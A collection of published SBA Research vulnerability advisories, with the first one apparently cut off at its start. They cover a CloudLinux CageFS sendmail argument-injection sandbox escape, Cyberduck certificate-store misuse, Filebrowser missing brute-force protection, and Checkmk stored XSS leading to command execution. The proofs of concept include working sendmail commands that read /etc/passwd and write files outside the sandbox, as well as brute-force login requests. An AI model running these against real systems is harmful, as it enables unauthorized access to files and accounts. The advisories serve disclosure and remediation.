**Software/Product Name** : [CloudLinux CageFS](https://www.cloudlinux.com/) 13 | * **Vendor** : CloudLinux Inc. 14 | * **Affected Versions** : <= 7.0.8-2 15 | * **Fixed in Version** : 7.1.1-1 16 | * **CVE ID** : CVE-2020-36772 17 | * **CVSS Vector** : CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L 18 | * **CVSS Base Score** : 6.6 (Medium) 19 | 20 | ## Vendor Description ## 21 | 22 | > CloudLinux OS is the leading platform for multitenancy. It improves 23 | > server stability, density, and security by isolating each tenant and 24 | > giving them allocated server resources. This creates an environment 25 | > that feels more like a virtual server than a shared hosting account. 26 | > By doing so, CloudLinux OS reduces operating costs and churn rates, 27 | > and increases profitability. 28 | 29 | Source: 30 | 31 | ## Impact ## 32 | 33 | A CageFS-restricted local user can read and write arbitrary files of certain 34 | file formats outside the CageFS environment by exploiting the vulnerability 35 | documented in this advisory. 36 | 37 | ## Vulnerability Description ## 38 | 39 | CloudLinux offers a feature called proxy commands in CageFS environments. 40 | It allows limited execution of commands outside the CageFS environment from 41 | a user restricted within the CageFS environment. 42 | 43 | CageFS allows in its default configuration to execute `sendmail` as a proxy 44 | command outside the CageFS environment. This default configuration is 45 | designed to allow local programs sending emails by invoking `sendmail`. 46 | Due to the insufficient validation of sendmail's arguments an attacker can 47 | invoke other sendmail functionality as well. While CageFS applies some 48 | restrictions to the allowed arguments it does not restrict or validate the 49 | `-bi` and `-oA` arguments. 50 | 51 | Therefore, an attacker can have `sendmail` access arbitrary files which will 52 | be interpreted as alias database files by enabling the `newalias` mode of 53 | `sendmail` with `-bi` and specifying a file located outside the CageFS 54 | environment with `-oA`. 55 | 56 | On systems using the Postfix to Sendmail compatibility interface, a great 57 | number of different alias database types can be used to craft exploits. 58 | The compatibility interface internally calls `postalias` and besides the 59 | `-oA` argument already being dangerous by itself, it also suffers from an 60 | argument injection issue, which allows injection of additional Postfix 61 | specific arguments for `postalias`. However, this is not a security issue 62 | in Postfix. 63 | 64 | According to Postfix developers, Postfix's `sendmail` does not enforce a 65 | security policy on command-line arguments. Instead, it relies on the 66 | UNIX/Linux system to enforce access policies based on the effective user and 67 | group IDs of the process. If a security policy should be enforced, the 68 | calling process must sanitize the command-line arguments before they are 69 | given to `sendmail`. This includes but is not limited to sanity checks on 70 | pathnames, and if applicable sanity checks on file contents in a way that 71 | is not vulnerable to time-of-check to time-of-use race attacks, and 72 | disabling options processing with `--`. 73 | 74 | ## Proof of Concept ## 75 | 76 | For example, an attacker can read arbitrary files that at least partially 77 | follow the structure `key value` via the lookup table type 78 | `texthash`: 79 | 80 | ```sh 81 | $ sendmail -bi -oA'-s,-f,texthash:/etc/passwd' 82 | postalias: warning: /etc/passwd, line 1: expected format: key whitespace value -- ignoring this line 83 | [...] 84 | postalias: warning: /etc/passwd, line 211: expected format: key whitespace value -- ignoring this line 85 | sssd:x:496:493:User: for sssd:/:/sbin/nologin 86 | dbus:x:81:81:System: message bus:/:/sbin/nologin 87 | polkitd:x:497:495:User: for polkitd:/:/sbin/nologin 88 | tss:x:59:59:Account: used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin 89 | systemd-resolve:x:193:193:systemd: Resolver:/:/sbin/nologin 90 | rngd:x:494:491:Random: Number Generator Daemon:/var/lib/rngd:/sbin/nologin 91 | sshd:x:74:74:Privilege-separated: SSH:/var/empty/sshd:/sbin/nologin 92 | systemd-coredump:x:499:497:systemd: Core Dumper:/:/sbin/nologin 93 | nobody:x:65534:65534:Kernel: Overflow User:/:/sbin/nologin 94 | ftp:x:14:50:FTP: User:/var/ftp:/sbin/nologin 95 | unbound:x:498:496:Unbound: DNS resolver:/etc/unbound:/sbin/nologin 96 | nrpe:x:492:486:NRPE: user for the NRPE service:/var/run/nrpe:/sbin/nologin 97 | ``` 98 | 99 | The attacker can also use other lookup table types which might disclose 100 | sensitive information. For example, `unix` allows the query of specific 101 | users regardless of the format: 102 | 103 | ```sh 104 | $ sendmail -bi -oA'-q,ftp2406151,unix:passwd.byname' 105 | ftp2406151:x:935:935::/home/ftp2406151:/sbin/nologin 106 | ``` 107 | 108 | An attacker can also write specific file formats outside the CageFS 109 | environment. For example, with the `hash` lookup table type: 110 | 111 | ```sh 112 | $ echo sba:was_here | sendmail -bi -oA'-o,-p,-i,-f,hash:/tmp/sba_was_here' 113 | $ sendmail -bi -oA'-s,-f,hash:/tmp/sba_was_here' 114 | @: @ 115 | YP_LAST_MODIFIED: 1594138203 116 | YP_MASTER_NAME: localhost 117 | sba: was_here 118 | ``` 119 | 120 | ## Recommended Countermeasures ## 121 | 122 | We recommend to restrict the `sendmail` command to only strictly required 123 | parameters using an allow list approach. At least the following parameters 124 | are known to cause dangerous behavior: 125 | 126 | * `-oA`: Allows specification of multiple paths and additional arguments. 127 | It is important to consider that it is directly followed by the pathname 128 | without a separator, i.e., `-oA/etc/passwd`. 129 | * `-bi`: Enables the `newalias` mode of `sendmail`. 130 | * `-I`: Enables the `newalias` mode of `sendmail`. 131 | * `-v`: If the parameter is added at least two times, i.e., `-vv`, 132 | `-vvvvv` or `-v -v`, it enables the verbose mode, which leaks the 133 | Postfix configuration in some cases. 134 | 135 | We did not fully analyze other parameters of `sendmail`, therefore, it is 136 | possible that `sendmail` as proxy command is also prone to other attacks. 137 | 138 | ## Timeline ## 139 | 140 | * `2020-07-07`: identification of vulnerability in version 7.0.6-1 141 | * `2020-07-10`: initial vendor contact 142 | * `2020-07-13`: initial vendor response 143 | * `2020-07-13`: disclosed vulnerability to vendor security contact 144 | * `2020-08-06`: vendor released version 7.1.1-1 to testing 145 | * `2020-09-03`: vendor released version 7.1.1-1 to production 146 | * `2020-10-02`: request CVE from MITRE 147 | * `2022-01-04`: MITRE declined request as it falls in the scope of Red Hat 148 | * `2024-01-19`: request CVE from Red Hat 149 | * `2024-01-22`: Red Hat assigned CVE-2020-36772 150 | * `2024-01-25`: public disclosure 151 | 152 | ## References ## 153 | 154 | * CageFS 7.1.1-1 beta: 155 | * CageFS 7.1.1-1 production: 156 | 157 | ## Credits ## 158 | 159 | * David Lisa Gnedt ([SBA Research](https://www.sba-research.org/)) 160 | -------------------------------------------------------------------------------- /2025/SBA-ADV-20250325-01_Cyberduck_Mountain_Duck_Certificate_Handling/README.md: -------------------------------------------------------------------------------- 1 | # Cyberduck and Mountain Duck - Improper Certificate Store Handling # 2 | 3 | ## Vulnerability Overview ## 4 | 5 | Cyberduck and Mountain Duck improper handle TLS certificate pinning for 6 | untrusted certificates (e.g., self-signed), unnecessarily installing it to the 7 | *Windows Certificate Store* of the current user without any restrictions. 8 | This potentially allows attackers to bypass certificate-based authentication 9 | or authorization of other programs that trust this certificate store. 10 | 11 | * **Identifier** : SBA-ADV-20250325-01 12 | * **Type of Vulnerability** : CWE-266: Incorrect Privilege Assignment 13 | * **Software/Product Name** : [Cyberduck](https://cyberduck.io/) and [Mountain Duck](https://mountainduck.io/) 14 | * **Vendor** : [iterate GmbH](https://iterate.ch/) 15 | * **Affected Versions** : Cyberduck <= 9.1.6 and Mountain Duck <= 4.17.5 16 | * **Fixed in Version** : Cyberduck 9.1.7 and Mountain Duck 4.17.6 17 | * **CVE ID** : CVE-2025-41255 18 | * **GHSA** : GHSA-vjjc-grpp-m655 19 | * **CVSS Vector** : CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:N 20 | * **CVSS Base Score** : 8.0 (High) 21 | 22 | ## Vendor Description ## 23 | 24 | > Cyberduck is a libre server and cloud storage browser for Mac and Windows 25 | > with support for FTP, SFTP, WebDAV, Amazon S3, OpenStack Swift, Backblaze 26 | > B2, Microsoft Azure & OneDrive, Google Drive and Dropbox. 27 | 28 | Source: 29 | 30 | > Mountain Duck lets you mount server and cloud storage as a disk in Finder 31 | > on macOS and the File Explorer on Windows. Open remote files with any 32 | > application and work like on a local volume. 33 | 34 | Source: 35 | 36 | ## Impact ## 37 | 38 | Other programs on the system that trust the *Windows Certificate Store* of 39 | the current user can be attacked. 40 | As the intended purpose of the certificate is not restricted, it can be 41 | misused e.g., to perform server authentication, code signing or 42 | machine-in-the-middle attacks. 43 | 44 | ## Vulnerability Description ## 45 | 46 | When permanently accepting an unknown TLS certificate for a specified 47 | service, Cyberduck and Mountain Duck add the certificate to their own 48 | configuration file and to the `Trusted Root Certification Authorities` 49 | of the *Windows Certificate Store* of the current user, whereby its 50 | `Intended Purposes` is set to ``. 51 | This means that all programs which trust the users *Windows Certificate 52 | Store* also trust this certificate for all use cases. 53 | 54 | ## Proof of Concept ## 55 | 56 | 1. Setup a TLS encrypted *WebDAV* server, which uses a self-signed 57 | certificate (in this case at the IP address `10.42.42.1`). 58 | 59 | 2. Create a new connection to the server in Cyberduck or Mountain Duck. 60 | 61 | 3. The following certificate error is shown, since the self-signed 62 | certificate is not trusted: 63 | ![Certificate error](./images/Certificate%20Error.png) 64 | To always trust this certificate for this connection, `Always Trust` must be 65 | checked before clicking `Continue`. 66 | 67 | 4. Afterwards the following dialog shows up, asking if you want to install 68 | the certificate: 69 | ![Security warning](./images/Security%20Warning.png) 70 | By clicking `No` the connection process gets canceled, therefore to continue 71 | clicking `Yes` is required. 72 | 73 | 5. Now, the certificate is stored within the 74 | `Trusted Root Certification Authorities` of the *Windows Certificate Store* 75 | of the current user, whereby its `Intended Purposes` is set to ``: 76 | ![Windows Certificate Store](./images/Windows%20Certificate%20Store.png) 77 | The thumbprint of the certificate is also stored at the configuration file 78 | of the application: 79 | 80 | Cyberduck (`C:\Users\\AppData\Roaming\Cyberduck\Cyberduck.user.config`): 81 | 82 | ```xml 83 | False 84 | 85 | [...] 86 | 87 | 88 | 89 | ``` 90 | 91 | Moutain Duck (`C:\Users\\AppData\Roaming\Cyberduck\Mountain Duck.user.config`): 92 | 93 | ```xml 94 | False 95 | 96 | 97 | 98 | 99 | 100 | 101 | ``` 102 | 103 | This means that an attacker could, for example, use a phishing attack to 104 | trick a victim into connecting to a server that uses a self-signed 105 | certificate and is under the attacker's control. If the victim permanently 106 | trusts the presented certificate for the specified connection, the 107 | certificate is actually not only pinned for this specific connection, 108 | but it is installed in the `Trusted Root Certification Authorities` of the 109 | *Windows Certificate Store* of the current user, whereby its 110 | `Intended Purposes` is set to ``. This allows other programs on the 111 | victim's system to be attacked. 112 | 113 | ## Recommended Countermeasures ## 114 | 115 | We recommend to update to Cyberduck version 9.1.7 / Mountain Duck version 116 | 4.17.6 or later, which applies the following countermeasure. 117 | 118 | When permanently accepting a TLS certificate for a specific service, the 119 | application should store the certificate fingerprint only in its own 120 | configuration file rather than installing the certificate in the Windows 121 | Certificate Store. 122 | Since the certificate can be manually removed from the Windows Certificate 123 | Store after installation and the applications do not display any certificate 124 | errors, it seems that only the own configuration file is used to 125 | verify pinned certificates anyway. 126 | Adding the certificate to the *Windows Certificate Store* is therefore 127 | apparently not necessary and only expands the system's attack surface 128 | without any need. 129 | 130 | ## Timeline ## 131 | 132 | * `2025-03-25` Identified the vulnerability in Cyberduck version 9.1.3 133 | and Mountain Duck version 4.17.3 134 | * `2025-03-27` Initial contact attempt and disclosure of vulnerability to 135 | iterate GmbH via GitHub Security Advisory 136 | * `2025-04-09` Vendor accepted this report 137 | * `2025-06-20` Vendor created a private fork to address the problem 138 | * `2025-06-23` Vendor merged the patch to main 139 | * `2025-06-24` Vendor released Cyberduck 9.1.7 / Mountain Duck 4.17.6 140 | * `2025-06-24` Public disclosure via GHSA 141 | * `2025-06-25` SBA Research assigned CVE-2025-41255 142 | * `2025-06-25` Public disclosure via CVE 143 | 144 | ## References ## 145 | 146 | * GitHub Security Advisory. Cyberduck and Mountain Duck - Improper Certificate Store Handling: 147 | 148 | ## Credits ## 149 | 150 | * Andreas Boll ([SBA Research](https://www.sba-research.org/)) 151 | * Thomas Kostal ([SBA Research](https://www.sba-research.org/)) -------------------------------------------------------------------------------- /2025/SBA-ADV-20250327-01_Filebrowser_Insecure_Password_Handling/README.md: -------------------------------------------------------------------------------- 1 | # Filebrowser Insecure Password Handling # 2 | 3 | ## Vulnerability Overview ## 4 | 5 | All user accounts authenticate towards a Filebrowser instance with a 6 | password. A missing password policy and brute-force protection makes it 7 | impossible for administrators to properly secure the authentication process. 8 | 9 | * **Identifier** : SBA-ADV-20250327-01 10 | * **Type of Vulnerability** : Weak Authentication 11 | * **Software/Product Name** : [Filebrowser](https://filebrowser.org/) 12 | * **Vendor** : [Filebrowser](https://github.com/filebrowser) 13 | * **Affected Versions** : <= 2.34.0 14 | * **Fixed in Version** : 2.34.1 15 | * **CVE ID** : CVE-2025-52997 16 | * **CVSS Vector** : CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N 17 | * **CVSS Base Score** : 5.9 (Medium) 18 | 19 | ## Vendor Description ## 20 | 21 | > filebrowser provides a file managing interface within a specified directory 22 | > and it can be used to upload, delete, preview, rename and edit your files. 23 | > It allows the creation of multiple users and each user can have its own 24 | > directory. It can be used as a standalone app. 25 | 26 | Source: 27 | 28 | ## Impact ## 29 | 30 | Attackers can mount a brute-force attack against the passwords of all 31 | accounts of an instance. Since the application is lacking the ability to 32 | prevent users from choosing a weak password, the attack is likely to succeed. 33 | 34 | ## Vulnerability Description ## 35 | 36 | The application implements a classical authentication scheme using a username 37 | and password combination. While employed by many systems, this scheme is 38 | quite error-prone and a common cause for vulnerabilities. Filebrowser's 39 | implementation has multiple weak points: 40 | 41 | 1. Since the application is missing the capability for administrators to 42 | define a password policy, users are at liberty to set trivial and 43 | well-known passwords such as `secret` or even ones with only single digit 44 | like `1`. 45 | 2. New instances are set up with a default password of `admin` for the 46 | initial administrative account. This password is well known and easily 47 | guessable. While the documentation advises to change this password, the 48 | application does not technically enforce it. 49 | 3. The application does not implement any brute-force protection for the 50 | authentication endpoint. Attackers can make as many guesses for a password 51 | as the network bandwidth allows. 52 | 53 | The combination of these problems makes it likely, that an attacker will 54 | succeed in compromising at least one account in a Filebrowser instance, 55 | possibly even one with administrative privileges. The likelihood of such an 56 | attack increases substantially for internet-facing instances. 57 | 58 | ## Proof of Concept ## 59 | 60 | The insecure default credentials are documented on the application's website: 61 | 62 | ![Documentation for the default credentials](images/filebrowser_documentation_admincredentials.png) 63 | 64 | The following HTTP communication shows, that a trivial password of `1` can be 65 | configured by a user: 66 | 67 | ```http hl:11 68 | PUT /api/users/2 HTTP/1.1 69 | Host: filebrowser.local:8080 70 | Referer: http://filebrowser.local:8080/settings/profile 71 | X-Auth: eyJ[...] 72 | Content-Type: text/plain;charset=UTF-8 73 | Content-Length: 319 74 | Origin: http://filebrowser.local:8080 75 | Cookie: auth=eyJ[...] 76 | [...] 77 | 78 | {"what":"user","which":["password"],"data":{"id":2,"locale":"en","viewMode":"mosaic","singleClick":false,"perm":{"admin":false,"execute":true,"create":true,"rename":true,"modify":true,"delete":true,"share":true,"download":true},"commands":[],"lockPassword":false,"hideDotfiles":false,"dateFormat":false,"password":"1"}} 79 | 80 | HTTP/1.1 200 OK 81 | Cache-Control: no-cache, no-store, must-revalidate 82 | Content-Security-Policy: default-src 'self'; style-src 'unsafe-inline'; 83 | Content-Type: text/plain; charset=utf-8 84 | X-Content-Type-Options: nosniff 85 | Date: Thu, 27 Mar 2025 08:31:34 GMT 86 | Content-Length: 7 87 | 88 | 200 OK 89 | ``` 90 | 91 | The missing brute-force protection can easily be tested by repeatedly sending 92 | the following request to the application with a tool such as Burp or hydra. 93 | 94 | ```http 95 | POST /api/login HTTP/1.1 96 | Host: filebrowser.local:8080 97 | Content-Type: application/json 98 | Content-Length: 52 99 | Origin: http://filebrowser.local:8080 100 | [...] 101 | 102 | {"username":"admin","password":"myPasswordGuess","recaptcha":""} 103 | 104 | HTTP/1.1 403 Forbidden 105 | Cache-Control: no-cache, no-store, must-revalidate 106 | Content-Security-Policy: default-src 'self'; style-src 'unsafe-inline'; 107 | Content-Type: text/plain; charset=utf-8 108 | X-Content-Type-Options: nosniff 109 | Date: Thu, 27 Mar 2025 08:39:48 GMT 110 | Content-Length: 14 111 | 112 | 403 Forbidden 113 | ``` 114 | 115 | After sending 3000 bad passwords to the application within a few seconds, a 116 | successful authentication is still possible for the account: 117 | 118 | ```http 119 | POST /api/login HTTP/1.1 120 | Host: filebrowser.local:8080 121 | Content-Type: application/json 122 | Content-Length: 54 123 | Origin: http://filebrowser.local:8080 124 | [...] 125 | 126 | {"username":"admin","password":"myCorrectPassword","recaptcha":""} 127 | 128 | HTTP/1.1 200 OK 129 | Cache-Control: no-cache, no-store, must-revalidate 130 | Content-Security-Policy: default-src 'self'; style-src 'unsafe-inline'; 131 | Content-Type: text/plain 132 | Date: Thu, 27 Mar 2025 08:39:58 GMT 133 | Content-Length: 508 134 | 135 | eyJ[...] 136 | ``` 137 | 138 | ## Recommended Countermeasures ## 139 | 140 | The application should add an option to define a password policy in its 141 | administrative interface which allows to set a minimum length for passwords. 142 | The default settings should be in line with the NIST publication SP 800-63B. 143 | This means, that passwords of fewer than 8 characters should never be 144 | allowed by the application. Whenever a user sets a new password, the 145 | application should verify whether that password is part of a "known 146 | passwords" list. 147 | 148 | The application should either create a secure and random password for the 149 | `admin` account upon initialization or enforce an immediate password change 150 | when that user logs in for the first time using the default password. 151 | 152 | A brute-force protection needs to be implemented, which limits the allowed 153 | amount of authentication attempts per user within a certain timeframe. This 154 | implementation should employ *device tokens* to prevent targeted lockout 155 | attacks. 156 | 157 | In addition, it would be advisable to allow the integration of the 158 | application into and existing *Identity Provider* using protocols like LDAP 159 | or OIDC. 160 | 161 | ## Timeline ## 162 | 163 | * `2025-03-27` Identified the vulnerability in version 2.32.0 164 | * `2025-04-11` Contacted the project 165 | * `2025-04-29` Vulnerability disclosed to the project 166 | * `2025-06-25` Uploaded advisories to the project's GitHub repository 167 | * `2025-06-26` CVE ID assigned by GitHub 168 | * `2025-06-29` Fix released with version 2.34.1. Brute-Force protection has 169 | not been implemented, instead a recommendation to configure fail2ban has 170 | been added the documentation 171 | * `2025-06-30` Advisory published by project as `GHSA-cm2r-rg7r-p7gg` 172 | 173 | ## References ## 174 | 175 | * OWASP Authentication Cheat Sheet: 176 | * NIST Special Publication 800-63B. Digital Identity Guidelines. Passwords: 177 | * Pwned Passwords: 178 | * Common Credentials: 179 | * CWE-307: Improper Restriction of Excessive Authentication Attempts: 180 | * CWE-521: Weak Password Requirements: 181 | * CWE-1392: Use of Default Credentials: 182 | * GitHub Security Advisory: 183 | 184 | ## Credits ## 185 | 186 | * Mathias Tausig ([SBA Research](https://www.sba-research.org/)) 187 | -------------------------------------------------------------------------------- /2025/SBA-ADV-20250729-01_Checkmk_Cross_Site_Scripting/README.md: -------------------------------------------------------------------------------- 1 | # Checkmk Cross Site Scripting # 2 | 3 | ## Vulnerability Overview ## 4 | 5 | Checkmk in versions before 2.4.0p14 and 2.3.0p39, as well as in branches 6 | 2.2.0, 2.1.0 and 2.0.0 is prone to a Stored Cross-Site Scripting (XSS) 7 | vulnerability when used in a distributed monitoring setup. Any connected 8 | remote site can inject JavaScript code in the central site's user interface. 9 | 10 | * **Identifier** : SBA-ADV-20250729-01 11 | * **Type of Vulnerability** : Cross Site Scripting 12 | * **Software/Product Name** : [Checkmk UI](https://github.com/Checkmk/checkmk) 13 | * **Vendor** : [Checkmk](https://checkmk.com/) 14 | * **Affected Versions** : < 2.4.0p14, < 2.3.0p39, >= 2.2.0, >= 2.1.0, 15 | >= 2.0.0 16 | * **Fixed in Version** : 2.4.0p14, 2.3.0p39 17 | * **CVE ID** : CVE-2025-39663 18 | * **CVSS Vector** : CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H 19 | * **CVSS Base Score** : 9.1 (Critical) 20 | 21 | ## Vendor Description ## 22 | 23 | > Checkmk is a comprehensive IT monitoring system designed for scalability, 24 | > flexibility, and low resource consumption. It supports infrastructure and 25 | > application monitoring across physical, virtual, containerized, and cloud 26 | > environments. 27 | 28 | Source: 29 | 30 | ## Impact ## 31 | 32 | An attacker controlling a connected remote site can take control over web 33 | sessions viewing the status of the remote site's hosts or services. When 34 | attacking an admin session, this can lead to remote code execution in the 35 | central site due to various available functionalities. 36 | 37 | ## Vulnerability Description ## 38 | 39 | In a distributed monitoring setup, the central Checkmk site pulls information 40 | from remote sites about their hosts and service status and displays it in the 41 | user interface. The remote site can include HTML content in the service 42 | summary/details that is not correctly escaped in the user interface. This is 43 | problematic if the remote site is not trusted as much as the central site, for 44 | example, because it is operated by a different team or company or is located 45 | in a different security zone. 46 | 47 | ## Proof of Concept ## 48 | 49 | It is possible to modify the Checkmk services at the remote site to 50 | inject JavaScript code in all service check outputs. However, this is not 51 | necessary, since Checkmk provides the configuration option 52 | `Escape HTML in service output (Dangerous to deactivate - read help)`. 53 | Therefore, it is possible to show the exploitability by enabling this option 54 | in the remote site and only modifying a check on one host to return HTML 55 | content with JavaScript. 56 | 57 | As an example, we append the XSS vector `` to the 58 | output of the `win_defender` check script 59 | (`C:\ProgramData\checkmk\agent\plugins\win_defender.ps1`) on a monitored 60 | Windows host: 61 | 62 | ```powershell hl:4 63 | [...] 64 | if ($null -ne $DefenderData){ 65 | Write-Host "<<>>" 66 | Write-Host $RTP "`t" $AS_Age "`t" $AV_Age "`t" $AM_ProductVersion "`t" $AM_EngineVersion '' 67 | } 68 | ``` 69 | 70 | Since we did not modify, the configuration option 71 | `Escape HTML in service output (Dangerous to deactivate - read help)` at the 72 | remote site `site01` (on host `check1.site01.example`) yet, the user interface 73 | at the central site `site` (on host `omd.site.example`), displays the XSS 74 | vector correctly encoded: 75 | 76 | ![Display of correctly encoded XSS vector in the central site user interface](images/xss_escaped.png) 77 | 78 | Next, we modify the configuration option 79 | `Escape HTML in service output (Dangerous to deactivate - read help)` at the 80 | remote site `site01` by creating the configuration file 81 | `/omd/sites/site01/etc/check_mk/conf.d/wato/site01/rules.mk` directly: 82 | 83 | ```bash hl:22 84 | [admin@check1 ~]$ sudo su - site01 85 | Last login: Tue Jul 29 14:55:07 CEST 2025 on pts/0 86 | 87 | OMD[site01]:~$ ls -lah /omd/sites/site01/etc/check_mk/conf.d/wato/site01/ 88 | total 12K 89 | drwx------. 4 site01 site01 64 Jul 29 15:23 ./ 90 | drwxrwx---. 4 site01 site01 4.0K Jul 29 15:23 ../ 91 | -rw-rw----. 1 site01 site01 262 Jul 29 15:23 .wato 92 | -rw-rw----. 1 site01 site01 233 Jul 29 15:23 .wato.pkl 93 | drwx------. 2 site01 site01 69 Jul 29 15:23 linux/ 94 | drwx------. 2 site01 site01 85 Jul 29 15:23 windows/ 95 | 96 | OMD[site01]:~$ cp -a /tmp/rules.mk /omd/sites/site01/etc/check_mk/conf.d/wato/site01/rules.mk 97 | 98 | OMD[site01]:~$ cat /omd/sites/site01/etc/check_mk/conf.d/wato/site01/rules.mk 99 | # Written by Checkmk store 100 | 101 | 102 | extra_service_conf.setdefault('_ESCAPE_PLUGIN_OUTPUT', []) 103 | 104 | extra_service_conf['_ESCAPE_PLUGIN_OUTPUT'] = [ 105 | {'id': '6c861d8a-89f6-4a01-bc8d-1f323e1a9af2', 'value': '0', 'condition': {'host_folder': '/%s/' % FOLDER_PATH}, 'options': {'disabled': False}}, 106 | ] + extra_service_conf['_ESCAPE_PLUGIN_OUTPUT'] 107 | 108 | 109 | OMD[site01]:~$ ls -lah /omd/sites/site01/etc/check_mk/conf.d/wato/site01/ 110 | total 16K 111 | drwx------. 4 site01 site01 80 Jul 29 15:30 ./ 112 | drwxrwx---. 4 site01 site01 4.0K Jul 29 15:23 ../ 113 | -rw-rw----. 1 site01 site01 262 Jul 29 15:23 .wato 114 | -rw-rw----. 1 site01 site01 233 Jul 29 15:23 .wato.pkl 115 | drwx------. 2 site01 site01 69 Jul 29 15:23 linux/ 116 | -rw-rw----. 1 site01 site01 333 Jul 29 15:01 rules.mk 117 | drwx------. 2 site01 site01 85 Jul 29 15:23 windows/ 118 | ``` 119 | 120 | Next, it is necessary to update the configuration and restart the Checkmk core 121 | service: 122 | 123 | ```bash 124 | OMD[site01]:~$ cmk-update-config --site-may-run 125 | ATTENTION 126 | Some steps may take a long time depending on your installation. 127 | Please be patient. 128 | 129 | Cleanup precompiled host and folder files 130 | Verifying Checkmk configuration... 131 | 01/11 Legacy check plug-ins... 132 | [...] 133 | 11/11 Deprecated .mk configuration of plugins... 134 | Done (success) 135 | 136 | Updating Checkmk configuration... 137 | 01/37 Cleanup Micro Core config... 138 | [...] 139 | 36/37 Validating configuration files... 140 | 37/37 Update core config... 141 | Generating configuration for core (type cmc)... 142 | Starting full compilation for all hosts Creating global helper config...OK 143 | Creating cmc protobuf configuration...OK 144 | Done (success) 145 | 146 | OMD[site01]:~$ omd restart cmc 147 | Stopping cmc...killing 2801441........OK 148 | Starting cmc...OK 149 | ``` 150 | 151 | The whole process is equivalent to creating a 152 | `Escape HTML in service output (Dangerous to deactivate - read help)` rule 153 | with the value set to 154 | `Don't escape HTML (Dangerous - please read context help)` within the folder 155 | `site01` without further restrictions to hosts or services. 156 | 157 | If a victim now visits the service overview of the monitored Windows server on 158 | the central site `site`, the XSS vector gets executed. 159 | 160 | ![Executed XSS vector when viewing the service overview on the central site](images/xss_executed.png) 161 | 162 | ![XSS vector in the DOM of the page](images/xss_in_dom.png) 163 | 164 | The XSS vector gets executed on at least the following pages: 165 | 166 | ```plain 167 | https://omd.site.example/site/check_mk/view.py?host=winhost1.site01.example&view_name=host 168 | https://omd.site.example/site/check_mk/view.py?host=winhost1.site01.example&service=Windows+Defender&site=site01&view_name=service 169 | ``` 170 | 171 | ### Further Exploitation to OS Command Execution ### 172 | 173 | The XSS payload could take over the web session of the users visiting these 174 | pages and execute arbitrary functions with the permissions of the victim. If 175 | the victim is an administrator of the central site, it is possible to get code 176 | execution on the server of the central site. For example, by uploading and 177 | activating a malicious extension or by defining a custom data source program 178 | via the rule `Individual program call instead of agent access`. 179 | 180 | Due to time restrictions further exploitation was simulated by using the UI 181 | for creating a custom data source program via the rule 182 | `Individual program call instead of agent access` with the command line 183 | `/usr/bin/id`. For example, by testing the host connection, it is possible to 184 | observe the output of the command, which shows that it is possible to execute 185 | arbitrary OS commands with the Checkmk service user. 186 | 187 | ![OS command execution with the privileges of the Checkmk service user](images/rce_via_admin_session.png) 188 | 189 | ## Recommended Countermeasures ## 190 | 191 | We recommend updating to Checkmk version 2.4.0p14, 2.3.0p39 or later and 192 | disable the option `Trust this site completely` for all remote sites to apply 193 | the following countermeasure. 194 | 195 | Checkmk should not allow HTML content from remote sites and instead apply 196 | correct encoding according to the output context. For example, when displaying 197 | the content within an HTML website, HTML encoding must be performed before the 198 | untrusted data is displayed. 199 | 200 | ## Timeline ## 201 | 202 | * `2025-07-29` identification of vulnerability in version 2.4.0p1 203 | * `2025-08-01` initial vendor contact via 204 | * `2025-08-04` disclosed vulnerability to vendor 205 | * `2025-08-04` vendor response with initial assessment 206 | * `2025-08-08` vendor confirmed vulnerability and assigned CVE-2025-39663 207 | * `2025-10-20` vendor released fix in version 2.4.0p14 208 | * `2025-10-23` vendor released fix in version 2.3.0p39 209 | * `2025-10-30` public disclosure 210 | 211 | ## References ## 212 | 213 | 1. Checkmk. Werk #17998: Add option to configure trust between central and 214 | remote site: 215 | 2. Checkmk Docs. Data source programs: 216 | 217 | 3. OWASP Cheat Sheet Series. Cross Site Scripting Prevention Cheat Sheet: 218 | 219 | 4. OWASP Web Security Testing Guide (WSTG) v4.2. Testing for Stored Cross Site 220 | Scripting: 221 | 222 | 5. OWASP Application Security Verification Standard (ASVS) v4.0.3. Section 5.3 223 | Output Encoding and Injection Prevention: 224 | 225 | 6. Common Weakness Enumeration. CWE-79 Improper Neutralization of Input During 226 | Web Page Generation ('Cross-site Scripting'): 227 | 228 | 229 | ## Credits ## 230 | 231 | * Lisa Gnedt ([SBA Research](https://www.sba-research.org/)) 232 | --------------------------------------------------------------------------------